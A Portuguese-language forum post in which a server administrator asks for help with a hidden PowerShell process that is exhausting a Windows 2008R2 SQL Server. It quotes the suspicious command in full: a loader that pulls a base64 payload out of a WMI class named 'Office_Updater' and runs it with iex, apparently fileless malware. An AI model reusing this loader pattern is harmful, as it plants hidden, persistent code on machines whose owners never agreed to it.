Temos um servidor padrão do Windows 2008R2 que usamos para o SQL Server. Vamos movê-lo para um novo host assim que descobrirmos por que o powershell está consumindo todos os nossos recursos. Não queremos movê-lo até termos certeza de que isso não será transferido para o novo host.
O powershell que está sendo executado está chamando assim:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -W Hidden "$mon = ([WmiClass] 'root\default:Office_Updater').Properties['mon'].Value;$funs = ([WmiClass] 'root\default:Office_Updater').Properties['funs'].Value ;iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs)));Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($mon, $mon, 'Void', 0, '', '')"
Quando assistimos no monitor de processo, foi isso que mostrou:
Não sei exatamente o que isso está fazendo e não tenho ideia de como impedir que ele seja iniciado, pois não há nenhum serviço em execução, que eu possa ver, que o inicie.
Alguma sugestão sobre como parar isso ou o que ele está tentando realizar? Está matando os recursos em nosso servidor e bloqueando-o. Não tenho certeza se é um malware ou um serviço que está chamando e nós simplesmente não sabemos qual serviço.
Até mesmo uma ideia do que está tentando realizar ajudaria. Alguma sugestão?